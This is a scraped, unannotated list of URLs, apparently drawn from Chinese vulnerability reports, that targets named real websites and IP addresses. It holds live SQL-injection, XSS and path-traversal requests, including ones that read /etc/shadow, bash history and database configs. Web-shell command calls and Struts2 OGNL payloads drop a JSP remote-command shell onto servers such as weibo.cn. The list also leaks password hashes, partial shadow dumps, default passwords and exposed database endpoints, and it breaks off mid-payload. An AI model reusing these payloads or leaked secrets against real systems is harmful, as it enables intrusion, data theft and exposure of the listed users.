http://**.**.**.**/live800/ http://**.**.**.**/live800/ http://**.**.**.**/live800/ http://www.uhuibao.com/yh/detail/?ytid=0&suid=261&yid=1 http://www.uhuibao.com/index.php/?s=1 http://www.uhuibao.com/card/index/?chl=web http://www.o2osl.com/OWebsite/product.html http://mcenter.o2osl.com:8888/home/Backstage/homePage http://trends.baidu.com/tour/ajax/scenic inurl:password http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1613147&Contract_mf=%E9%BB%84%E6%99%B6%E6%99%B6&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1743081&Contract_mf=%E9%99%88%E5%9B%BD%E5%BC%BA&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1733822&Contract_mf=%E6%98%8E%E6%98%9F&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1742984&Contract_mf=%E5%BA%84%E5%AE%B6%E7%90%A2&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1547220&Contract_mf=%E8%B5%B5%E5%91%88%E5%8D%8E&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1643816&Contract_mf=%E6%9D%8E%E6%A2%A6%E5%9C%86&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1741851&Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC&Contract_Password=666666 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1743081&Contract_mf=%E9%99%88%E5%9B%BD%E5%BC%BA&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1709255&Contract_mf=%E9%87%91%E5%BF%97%E5%9B%BD&Contract_Password=000000 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1668634&Contract_mf=%E5%BC%A0%E4%BA%AE%27and%271%27=%271&Contract_Password=123456 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1706061&Contract_mf=%E6%9F%B3%E4%BC%9F&Contract_Password=000000 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1613147&Contract_mf=%E9%BB%84%E6%99%B6%E6%99%B6&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1674630&Contract_mf=%E5%BC%A0%E5%BF%97%E5%85%B4&Contract_Password=000000 http://v6.bang.weibo.com/aj/gongyi/rank?ajwvr=6&__rnd=1460968054871 http://v6.bang.weibo.com http://bbs.showboom.cn/utility/convert/index.php http://wooyun.org/bugs/wooyun-2013-045611 http://mall.showboom.cn/ http://mall.showboom.cn/wuyun.php http://active.zol.com.cn/08active/admin/326gs/operate.php?id=8946&del=1 http://passport.gq.com.cn/front/apiconnect/thirdAuthor http://passport.gq.com.cn/front/apiconnect/thirdAuthor https://shanghai.602.com/svn/ http://**.**.**.**/ http://z.easou.com/show.m?esid=zxHvHNlffsZ&p=1&pn=1&q=&sr=192.168.1.10&wver=c# www.10jqka.com.cn www.10jqka.com.cn R7UQ9Z1:16827:0:99999:7 http://weibo.com/ttarticle/p/show?id=2309403959482995611795 http://bbs.appcan.cn//config/config_ucenter.php.bak http://edu.appcan.cn/train_detail_new.html?id=498 http://edu.appcan.cn/train_outline1.html?train_place=%3Cscript%3Ealert%281%29%3C/script%3E site:appcan.cn inurl:login http://siteadm.appcan.cn/Daemon/appshow/listinterfaceById?status=1&typeid=82&rows=8&callback=jQuery19103505221238365238_1461031756517&_=1461031756518 http://siteadm.appcan/Daemon http://mail.west263.com/login.php?Cmd=login localhost:sqlmap http://mail.west263.com/login.php?Cmd=login http://sqlmap.org http://crm.southernfund.com:8088/CRMWebService.asmx?WSDL http://webservice.sinitek.com/sendmessagetoapns com:8088 http://fanyi.youdao.com/WebpageTranslate?keyfrom=webfanyi.top&url=http%3A%2F%2Fwww.wooyun.org&type=EN2ZH_CN https://github.com/fuhongliang/api.crc360.cn http://shenzhou.medlive.cn/ https://codeload.github.com/luoqiboy/first_program/ http://if.uhuibao.com:9090/interface/askApp.action http://pay.uhuibao.com:8083/ http://pay.uhuibao.com:8083/SunspeedyPayment/VloginUser.action com:8083 http://**.**.**.**:80/flight/view_xz.aspx?id=9 http://www.xueyazhushou.com/api/do_bbs.php?Action=getInfoContent&info_id=598&pages=1&nums=20&app=0&platform=android&systemVer=5.1&version=2.6.1&app_ver=2.6.1&imei=867556021834224&device_id=867556021834224&mac=ec%3A5a%3A86%3Aff%3A35%3A6f&secureId=f671d23b5fac5957&installId=1460978536986&phoneType=8681-A01_by_QiKU&vendor=baidu http://crew.9air.com:8080/9airweb/allUserMap.action http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/etc/shadow http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=whoami http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=ls%20/ http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/history.log sjc.hubu.edu.cn/sjxx_detail.aspid=358 http://qupai.wandamoviepark.com/ http://114.251.127.80/names.nsf/$users http://101.198.161.130:9200/ http://101.198.161.130:9200/_plugin/head/ http://101.198.161.130:9200/_nodes http://wechat2.cc.letv.com/ http://wechat2.cc.letv.com/EliteWebChat/sessionTranscript.do?sessionId=2504969 http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=8156628 http://www.jingzhengu.com/Resources/ajax/Userinfo.ashx www.jingzhengu.com http://www.jingzhengu.com http://ys.zbj.com/ http://tiyan.baidu.com/static/img.php?s=15,15&n=icon-info.png http://tiyan.baidu.com/static/img.php?s=15,15&n=/icon-info.png http://tiyan.baidu.com/static/img.php?s=15,15&n=./icon-info.png http://tiyan.baidu.com/static/img.php?s=15,15&n=../icon-info.png http://tiyan.baidu.com/static/img.php?s=15,15&n=....//icon-info.png http://tiyan.baidu.com/static/img.php?s=16,40&n=....//....//index.php%00.png http://tiyan.baidu.com/static/img.php?s=16,40&n=....//....//....//....//....//....//....//home/bae/bae/phplib/config/BaeMysqlConfigure.class.php%00.png读取数据库连接 http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/get-point-view-list?limit=1 http://house.leju.com/ck/search-4/?hy91=0&keyword=1 http://www.wandahotels.com/phpsso_server/存在PHP默认登录后台 www.wandahotels.com http://www.wandahotels.com com:8080 com:8080 http://101.198.161.117/ jdbc:sqlserver://192.168.1.13:1433 classpath:/ibatis/sqlMap-config-sqlserver.xml classpath:/ibatis/sqlserver/sqlmap/*.xml IP:116.31.80.147:443 IP:116.31.80.144:443 cn:40056 http://101.198.161.39:6379 www.peaksport.com/candidate.phpsubject=%E5%8C%BA%E5%9F%9F%E7%BB%8F%E7%90%86&rid=200 http://ht.letv.cn/,发现各种系统 https://github.com/evilbinary86/MarkdownNote/blob/bf8cda7564d169250da146f25084702a2d40f49a/%E5%8D%8E%E6%B6%A6%E5%B7%A5%E4%BD%9C/%E6%94%AF%E4%BB%98%E5%8D%95%E4%B8%8A%E4%BC%A0%E4%B8%9A%E5%8A%A1/%E7%AC%94%E8%AE%B0.md http://www.crvbest.com.cn/OurHome http://android.myapp.com/myapp/detail.htm?apkName=com.adtech.xnclient http://211.151.3.108/index http://i.camera360.com/oalogin.html?action=logout&redirectUrl=http://support.camera360.com/www/ https://hao123.camera360.com/ http://work.ems.com.cn http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=831&str=fl https://icrew.csair.com可下载南航内部使用的APP“客舱移动” https://icrew.csair.com/mobile/flightScheduled_fast.action?empId=182473 http://sso.treebear.cn/user/ssologin.htm?sid=treebear http://shop.treebear.cn/user.php http://vip.witown.cn http://42.121.192.49:8080/applications.html http://product.aili.com//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://hzp.aili.com//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://brand.aili.com//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://**.**.**/bugs/wooyun-2010-0176803_ https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn https://etrade.10jqka.com.cn http://183.131.12.195/ ..logs/cso.access.log..main......p*..............8................q.......t......................................h......................................................................./usr/local/nginx/logs/cso.access.log.error_log..logs/cso.error.log..notice...............t....................................................................../usr/local/nginx/logs/cso.error.log.root../var/www/cso/www..location.m\\.html$.de`|...............+......8-......./......................./.......0 http://60.28.216.70/ http://60.28.216.70/log.php http://v.2345.com/moviecore/server/variety/index.php?act=ajaxMoreEpisode&api=-1%27%20or%201=3--%20&ctl=newDetail&id=18363&month=0&nowTotal=14&time=1461014443020&timeStamp=1461014443020&title=%BB%B6%C0%D6%CF%B2%BE%E7%C8%CB&total=14&year=2015 http://v.2345.com/moviecore/server/variety/index.php?act=ajaxMoreEpisode&api=-1%27%20or%201=1--%20&ctl=newDetail&id=18363&month=0&nowTotal=14&time=1461014443020&timeStamp=1461014443020&title=%BB%B6%C0%D6%CF%B2%BE%E7%C8%CB&total=14&year=2015 http://bdpp.leju.com/test.php https://**.**.**.**/c445156840/GESWEB2/ https://**.**.**.**/c445156840/GESWEB2/blob/5b800da4d55c6fac6f31697e8fab7755cf706d5d/src/main/resources/config.ini jdbc:oracle:thin:@**.**.**.**:9090:ora10g http://t.hexin.cn/dlxhtml/quick_query.php http://122.228.73.217:8081/../../../../../../../../etc/shadow http://plus.aili.com http://plus.aili.com/topicLab/index.php?m=user&a=topicVote&callback=jsonp1460891080351&contentid=1793&type=clothv3_index&dosubmit=1&r=0.7601377370301634 http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/root/.bash_history http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/usr/local/nginx/conf/ngx_passwd zhangyong:2RsUTTsvOmOdA zengqh:DunTiVFkBxz7A http://blog.10jqka.com.cn/blogerTalk.php?action=blogerTalk&userid=84049333 http://test.wenji99.com http://test.wenji99.com/cate_show_ajax.php?oper=ajax&call=get_cate http://moni.10jqka.com.cn http://cms.ubernihao.com http://cms.ubernihao.com http://cms.ubernihao.com http://cms.ubernihao.com/ http://cms.ubernihao.com/login.html http://cms.ubernihao.com/login.html http://cms.ubernihao.com/.git/config http://cms.ubernihao.com/.git/config http://cms.ubernihao.com http://cms.ubernihao.com/ http://cms.ubernihao.com http://cms.ubernihao.com/.git/config http://cms.ubernihao.com/login.html http://cms.ubernihao.com/.git/config net:muzhibuluo/uber_cms_v2.git http://code.ubernihao.com/logs/ http://app.huawei.com/icasewww/eweb/admin/login.jsp http://app.huawei.com/icasewww/eweb/admin/upload.jsp?id=11&d_viewmode=list&dir=eweb%2Fskin icasewwwEAR-edition1.6.ear/icaseWar.war http://p.aijee.cn/CApp1_2_4/GetCityDomain http://wiki.ename.cn/doc/search https://github.com/wxlong1985/baoxian https://github.com/wxlong1985/baoxian/blob/ce2a5bb30610653b2588bd4db7c2e0f750567743/src/main/resources/deploy.properties jdbc:mysql://120.27.160.138/baoxian?useUnicode=true&characterEncoding=UTF-8 http://**.**.**.**/bugs/wooyun-2016-0183263,想起来这家券商也是万户的OA,发现果然也存在注入 redis://60.28.244.38:6300 redis://60.28.244.38:6301 redis://60.28.244.141:6301 redis://60.28.244.141:6300 redis://60.28.244.140:6300 redis://60.28.244.140:6301 http://180.153.190.79:8880/phpMyAdmin/ www.west.cn/services/server/serverdiy.asp http://**.**.**.**/ http://jkwin.com.cn/solr/#/ http://**.**.**.**:8080/km/login.dhtml http://www.rapoo.cn/ http://ros.rapoo.cn:8090 http://ros.rapoo.cn:8090/Default.aspx http://xq80.hubu.edu.cn http://flashcms.10jqka.com.cn/ http://www.coolyun.com/guide/weather.html http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637&start=0&limit=30&uid=f7e6de65c1846a70c7411b1c141591e8&vn=5.1.2&channel=zhuzhan&sogouid=5be7dec65e2011b9575759714b0d1930&stoken==IhTefovaz0ppdInTQxRlnQ&cellid=gsm_460_00_9763_3922&sc=0 http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637 http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637 http://wooyun.org/bugs/wooyun-2013-021889 http://wooyun.org/bugs/wooyun-2013-021889 http://183.131.12.181:8601这个地址上发现是java http://baike.sogou.com/ http://wapyd.hexin.cn/ http://wapyd.hexin.cn/dlarea/dl_model.php?bid=1&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&mid=1902&mname=1.5%E7%B3%BB%E7%BB%9F%E5%8F%8A%E4%BB%A5%E4%B8%8A&from= http://wapdx.hexin.cn/lhj/dl_pt.php?ptid=765&ptname=java&verid=42&vername=%E9%A2%86%E8%88%AA%E5%AE%B6 http://hntel.hexin.cn/hntelxhtml/dlModelFile.php?brand=3g http://www.lvmama.com/guide/ajax/api.php?action=getPlaceOrg&placeid=79 http://test.hexin.cn/htdocs.tgz http://test.hexin.cn/htdocs/eq/eqadmin/interface/wxloginprompt.php http://180.153.190.79:8880/uc_server/admin.php http://**.**.**.**:8080 http://training.sfchina.bmw.com.cn/jsp/home/login.jsp http://221.122.80.105/help.jspx jdbc:odbc:lcms jdbc:oracle:thin:@192.168.0.152:1521:orcl http://www.app-echo.com/index/login主站登陆没有任何限制 http://**.**.**.**:999/ http://gzxijiu.cn:82/Service1.asmx http://tempuri.org/FCCodeTracert http://admin.rapoo.cn/log.txt http://rpw.rapoo.cn/rapoo.zip http://**.**.**.**:9012/login.action http://**.**.**.**:9006/login.action http://**.**.**.**:9015/weblogin.action http://**.**.**.**:9012/login.action http://**.**.**.**:9006/login.action http://**.**.**.**:9010/amsg!feecdrlist.action http://**.**.**.**:9012/login.action http://**.**.**.**:8081/axis2/axis2-admin/login http://**.**.**.**:8081/axis2/services/Cat/exec?cmd=whoami http://**.**.**.**:8081/point/f.jsp http://api.lespark.us/feedback_view?&last_id=57144342c2fa5169c09fa132 http://**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1741851&Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC&Contract_Password=666666 https://mail.jj-inn.com/owa/ http://tuis.papa91.com/?aid=NQZFok http://**.**.**.**/uploadFile/loadFeatureImgDataByFileName.do?fileName=d12da195-4e90-486d-ba9e-be00e7383263_20160325022009209.jpg http://**.**.**.**.la/show.php?id=6 https://sslvpn.ganji.com http://219.139.25.12/loginInit.system http://219.139.25.11/loginInit.system http://219.139.25.4/loginInit.system http://219.139.25.12/uddiexplorer/ss.jsp http://219.139.25.12/uddiexplorer/out.jsp http://202.108.43.241:8080/.svn/entries http://123.126.34.179:7002/login http://123.126.34.179:7002/cmd.jsp http://www.jscpel.com:9090/JSCNPL_TMS_TEST/login.action root:/roo***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** bus:/:/***** owner:/d***** abrt:/sb***** daemon:/:/***** ntp:/sbi***** SSH:/var/empty***** aemon:/:/s***** User:/***** ver:/var/lib/ng***** User:/var/lib***** User:/var/li***** www:/***** db:6***** cd:13***** http://pay.mojing.cn:80/api/getvideo.php?version=3.00.1221.2211 http://box.915.com/api/dataapi.php?devicecode=564443CC-9189-42C1-9CC9-0922116AD5C4&imei=&imsi=&iosflag=2&languageid=1&ordercode=1&packetid=1&page=1&pagesize=1&platform=1&protocol=100004&resolution=640*1136&screensize=320*568&sessionid=×tamp=1461386243&token=32ed04e2e45b2729a35e5d10b5311635&&userid=18783&versioncode=1.3.1&versionid=8 https://mail.cib-fund.com.cn/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.cib-fund.com.cn%2fowa http://mj.cms.mojing.cn/api/v1/vr_market/source_search.php?page=1&source_type=3&title=aaaa&version=20151016 http://life.stockstar.com/config.ini http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/system_main.do http://**.**.**.**/system_getVaildImg.do http://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc_1.shtml http://db.duowan.com/zx2/skill.php?c=1 http://db.duowan.com/zx2/skill.php?c=1 http://e.dangdang.com/rank_detail_page.html http://download.egfbank.com.cn/app1.html cn:8080 http://mobile2.10jqka.com.cn/interface/query_account.php?account=admin&password=¬check=1 https://222.66.119.19/ http://cats.10jqka.com.cn/cat http://pos.10jqka.com.cn/center/center/myupload/uploaderid/235070423 http://**.**.**.**/%C0%AE/WEB-INF/webContext.xml http://localhost:8002/businessFacade.service"/ http://localhost:9001/coreInterFace.action http://mf.m.leju.com/v4/recommend/news.json?uuid=9b4b25ba3eeef889915f2411baa2fb00680e0bb6&system=iPhone%20OS9.3.1&idfa=564443CC-9189-42C1-9CC9-0922116AD5C4&gather_x=114.040960&time=1461481713&source=appStore&os=ios&gather_y=22.611311&city=sh&openuuid=196510DC30782F568F1853FF4C20665F&page=1&appkey=2408231234&model=iPhone&v=4.0 http://vaserviece.10jqka.com.cn/mobilecfxf/contenajax.php?path=test.txt http://vaserviece.10jqka.com.cn/mobilecfxf/contenajax.php?path=/etc/passwd http://m.leju.com/touch/esf/bj?ln=ljmf_h5&source=ios&s=yd_kdlj https://github.com/www1350/firstob/blob/cb501378df1718f54df7dbefc1c4ca577c334cbe/src/main/resources/conf/mail.properties https://mail.myhexin.com/src/webmail.php https://218.108.90.228:10089/hexin-crm http://hcp.xinnet.com/ http://218.107.6.142:7777/ encap:Ethernet F8:BC:12:4E:E8:34 addr:10.45.47.91 Bcast:10.45.47.255 Mask:255.255.255.0 fabc:12ff:fe4e:e834/64 Scope:Link MTU:1500 packets:1187328693 packets:1200637718 txqueuelen:1000 https://appserv.273.cn/1.3/search.getSaleDetail?_api_time=1461506128&_api_key=fa1f58046f169f08d3ebf086a11399e4&_api_token=ObudatLb7UdJcaOUfxOQKM6NszavuNMsJXRkJYiXZ%2BAup64TgIbKnvC%2Fb9rh7mjw&_app_source=3&_app_type=2&_app_version=3.2.0&id=18020272 http://mall.haval.com.cn/carload/spuSelector.html http://cip.dongfeng-nissan.com.cn https://etrade.cryuantafund.com/ http://t.docin.com/players/.ssh/known_hosts http://event8.wanmei.com/zxafoulstart/userlist.do http://testm.10jqka.com.cn/pay/pad_release.php?counturl=http://vaserviece.10jqka.com.cn/macd/index.php?module=count&goto=nwnd&op=goldpay¶m=macd&platform=ipad&s_id=206&source=macdd_gbuy1 http://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1 http://oa.winxuan.com/ServiceAction/com.velcro http://mall.moji.com www5.53kf.com http://www5.53kf.com https://appserv.273.cn/1.3/subscribe.updateClientId/?_api_time=1461545212.897876&_api_key=8a7f95774b1ce149fda1025298c310d9&_api_token=5UyTSYg9rhZy%2FkyyJPJTXhD88e9whsqPx9CobSuqNsAk0gaSp3Q7CyQgcq0NVYX6&_api_debug=1&_app_source=2&_app_type=2&_app_version=3.2.2 http://b2b.exijiu.cn/B2B/ele-business/Psgl/login.aspx http://b2b.exijiu.cn http://baike.baidu.com/view/12769298.htm http://activity.mafengwo.cn http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1 http://gzxijiu.cn:100/faxserver/ http://gzxijiu.cn:100/faxserver/JSActionServlet https://gmc.china-moutai.com/vpnweb/index.php?para=index http://www.wooyun.org/corps/%E7%BD%91%E5%BA%B7%E7%A7%91%E6%8A%80 http://tj.newsesf.leju.com/网站存在注入。 http://shop.xiamenair.com/prolist.aspx?k=1&n941808=v923726 http://gm.7.youzu.com/ http://live800.wan.renren.com/ http://gongyi.wanmei.com/ http://haoma.leju.com/api/user/get_friend_list.json http://**.**.**.** http://kh.10jqka.com.cn/card/index.php?action=getCardDetail&card_id=690331168%20or%207572%3d7573&callback=jsonp1 http://u8.qh168.com.cn:8080/acenter/admin.action https://sell.xiaoenai.net/order/list/search_all?name=A&phone=&id=&product_id= https://streetadm.xiaoenai.net/productions/list/search_all?id=10&seller_id=&title=&seller_name=&scene= http://chat.house.sina.com.cn/ http://chat.house.sina.com.cn/index.php/admin/room/index?cityid=-1&title=&id=&begintime=&endtime=&realname=&template= supports.house.sina.com.cn/chat http://chat.house.sina.com.cn的cookies就可以进去 http://supports.house.sina.com.cn site:maidou.com http://maidou.com/file/download.do?fileId=30038 http://10.15.3.96:8080 http://222.178.225.36:8083/SMS/ http://222.178.225.36:8083/SMS/freeWill.json http://**.**.**/_ http://**.**.**/job/%E4%BA%92%E8%81%94%E7%BD%91%E6%94%AF%E4%BB%98%E7%B3%BB%E7%BB%9F/ws/api/target/classes/com/lakala/sh/front/mpos/api/MPosRetCode.class/*view*/_ http://**.**.**/ http://**.**.**/script_ http://ywct.xiaoyule.cn/user/login http://event8.wanmei.com/zhuxian/zxdiamondlove/zxzuanshi!list.action http://**.**.**/_ http://**.**.**/script_ root:/roo***** on:/usr/s***** bin:/***** dev:/***** nc:/bin:/***** roxy:/bi***** w-data:/va***** up:/var/ba***** Manager:/***** http://**.**.**/ http://**.**.**/modroom.aspxid=33757 http://broker2.esf.leju.com/login/网站存在注入,详情见漏洞证明。 http://cdd.yun.pingan.com:8080/NewChannel/target/info com:8080 http://cdd.yun.pingan.com:8080 https://zxyh.nbcb.com.cn/desktop/LimitQry.do http://**.**.**.** http://channel.yy.com http://channel.yy.com/auth/login.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E pom.xml/*view*/_ root:/roo***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** tor:/root:/***** ftp:/s***** http:/***** http://w.littleswan.com/weixin/serviceDetail.html?serviceId=555 http://w.littleswan.com/midea-weixin/serviceHelper/getDetailServiceInfo?serviceId=555 http://**.**.**.**/Login.aspx http://chexian.sinosig.com http://chexian.sinosig.com/NetCar/carCustomService_forwardClaimProgressSearch.action?selectedModuleId=claimProgress http://parter.xiaoao.com http://b2g.csair.com/login.action http://vote.sports.163.com/vote2/showVote.do?voteId=50589 http://vote.ent.163.com/vote2/showVote.do?voteId=4846 http://vote.news.163.com/vote2/showVote.do?voteId=43095 http://vote.game.163.com/vote2/showVote.do?voteId=28727 http://vote.lady.163.com/vote2/showGroup.do?vgId=1885 http://**.**.**.**/mall/ui/giftIndex.action http://shop.ehuatai.com/test.jsp?pwd=024&l=ls http://emall.qlbchina.com/mall/ui/giftIndex.action http://creditcard.gzcb.com.cn/mall/ui/giftIndex.action http://mall.hkbea.com.cn/mall/ui/giftIndex.action http://ccmall.bsb.com.cn/mall/ui/giftIndex.action http://www.tamax.jp/tamax/newhouse/search.action http://mall.nbcb.com.cn/mall/ui/giftIndex.action http://shop.fudian-bank.com/mall/ui/giftIndex.action http://1.202.165.69:7007/clqprt/LoginAction.action https://***.csair.com/***.action http://202.108.103.169/htweixin/InsuranceDownload.action http://sfocs-i.sf-express.com/SFweb/handler.action http://**.**.**/Account/LogOnReturnUrl=%2f_ http://**.**.**/ecardaccount/registersoftname=yunweb&version=**.**.**.**5_ http://103.15.200.54:9200/_plugin/head/ http://119.188.128.54:9200/_plugin/head/ http://103.15.200.81:50070/dfshealth.jsp http://gmtmc.95080.com/ https://soc.cs-air.com/opws-web/security-Remember-gotoLogin.action http://103.15.201.147:8001/faban/gotoLogin.action http://dream.300.cn/?id=734 http://**.**.**/_ http://**.**.**/job/site/ws/aboutus.html_ http://**.**.**/s__biz=MzA4MDI4OTUwNw==&mid=200366208&idx=2&sn=3da4406db9f089b8f0703187e39e8cc7&devicetype=webwx_ http://**.**.**/loginfrom=%2F_ http://**.**.**/script_ http://61.152.171.123:8888/hereditary_sharing/welcome/welcome.action http://www.tangscan.com https://rap.weibo.cn/account/mySetting.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E https://**.**.**.**/checkUidAvailable.action http://**.**.**.**/bugs/wooyun-2016-0170697 http://**.**.**.**:8091/logout.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%**.**.**.**.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%**.**.**.**.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.re